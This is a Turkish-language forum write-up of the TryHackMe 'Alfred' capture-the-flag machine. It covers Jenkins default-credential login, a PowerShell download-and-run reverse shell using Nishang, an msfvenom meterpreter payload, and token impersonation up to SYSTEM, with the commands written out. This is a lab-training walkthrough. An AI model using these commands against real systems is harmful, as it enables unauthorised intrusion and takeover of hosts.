THM Alfred CTF WriteUp

Ghost Killer

Harici Saldırı Timleri Koordinatörü
13 Ocak 2019
11,318
7,706
Herkese merhaba arkadaşlar. Bu konumuzda sizlerle beraber TryHackMe (THM) sitesinde bulunan Alfred isimli makineyi çözeceğiz. Hemen başlayalım.


Bilgi Toplama

Makineyi çözmeden önce bilgi toplamamız gerekiyor. Nmap aracımız ile bilgi topluyoruz.

Komutumuz;

Kod:
nmap -A -T4 makine ip

Tarama yaptığımızda 80, 3389 ve 8080 portlarının açık olduğunu görüyoruz. İlk sorumuzda ise bize kaç adet portun açık olduğu soruluyor. Kısaca ilk sorunun cevabı " 3 " olarak bulmuş oluyoruz.

kyeboor.png


Şimdi devam edelim. Makinemizin 10.10.153.16:8080 adresine gidiyoruz. Bizi böyle bir sayfa karşılıyor. (Jenkins, ücretsiz ve açık kaynaklı bir otomasyon sunucusudur)

jwlj41o.png


Varsayılan kullanıcı adı ve parola girildiğinde giriş yapabiliyoruz. Eğer giriş yapılmasaydı brute force saldırısı denenebilirdi. Varsayılan kullanıcı adı ve parolanın öğrenilmesi için google’da jenkins default credentials araması yapılabilir. Arama sonucunda username ve şifrenin admin/password olduğu gözükmekte. Ancak username ve şifre aslında admin/admin.

9qc88vp.jpg


Admin paneline başarıyla giriş yaptık. Admin sayfasında herhangi bir proje sayfası oluşturulup konfigüre sekmesine gidiyoruz.

s19ebnq.jpg


Konfigüre sayfasında sunucu tarafında windows komutları çalıştırılabiliyor. O yüzden powershell tcp dosyası yüklenerek çalıştırılabilir. Böylelikle netcat ile bağlantı kurularak kullanıcı yetkileri elde edilebilir.

Bunun için

Kod:
wget https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

komutuyla ihtiyaç duyduğumuz dosyayı indiriyoruz.


3qqk0gw.jpg


Komutumuz;

Kod:
sudo python3 -m http.server 80

ile http server başlatıyoruz.


k2gp5nn.jpg


Komutumuz;

Kod:
nc -lvnp 4444

portunda dinleme başlatıyoruz.


62s4nen.jpg


Komutumuz;

Kod:
powershell invoke-expression (New-Object Net.WebClient).DownloadString(‘http://10.11.3.198/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 10.9.153.179 -Port 4444

ile powershell komutu çalıştırıldıktan sonra netcat bağlantısı kurulmuş olur.


s6mslmr.jpg


Masaüstü dizinindeki user dosyası görüntülendiğinde ilk flag’a ulaşmış oluyoruz.

n5p40xd.jpg


Komutumuz;

Kod:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.9.153.179 LPORT=4444-f exe -o shell.exe

ile yetki yükseltmek için msfvenom ile shell.exe adında payload oluşturuyoruz.


rll5wwl.jpg


Komutumuz;

Kod:
powershell “(new-object system.net.webclient).downloadfile(‘http://10.9.153.179:80/shell.exe’,’shell.exe’)”

ile payload karşı tarafa yüklüyoruz.


lpfyvz1.jpg


İlerleyen aşamada meterpreter bağlantısı kuracağımız için msfconsole komutuyla m e t a sploit başlatılır ve gerekli konfigürasyon ayarlarını yapıyoruz.

4gibbry.jpg


Komutumuz;

Kod:
Start-Process shell.exe

ile payload çalıştırıyoruz.


dr59ch3.jpg


Payload çalıştırıldıktan sonra ****sploit’de sırasıyla run ve shell komutlarıyla meterpreter bağlantısını sağlıyoruz.

7u4u9g5.jpg


Komutumuz;

Kod:
whoami /priv

ile yetkilendirme ayrıcalıkları görüntüleyebiliyoruz. SeDebugPrivilege, SeImpersonatePrivilege yetkilerinin enabled olduğu görülüyor. Bu güvenlik açığı istismar edilebilir. Bunun için ****sploit’e geri dönüyoruz ve load incognito ile incognito modülünü başarıyla yüklüyoruz.


roons4j.jpg


Administrators token’ını taklit edebilmek için

Kod:
impersonate_token “BUILTIN \ Administrators”

komutunu kullanıyoruz.


1pieox9.jpg


ps ile çalışan process’ler görüntüleyebiliriz.

migrate 668 ile 668 işlemine admin NT AUTHORITY\SYSTEM yetkileri ile erişilir.


bcxb2ho.jpg


Tekrardan shell olunduktan sonra config dizinine gidiyoruz ve root flag’ına da ulaşıyoruz. Bu sayede makinemizi de çözmüş oluyoruz.

ro1py02.jpg


Makinemizi çözdük.

7i3362q.png




Konumuzun sonuna geldik. Okuduğunuz için teşekkürler. Başka bir konuda görüşmek üzere! :Smiley1009:


iUBacd.gif










 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.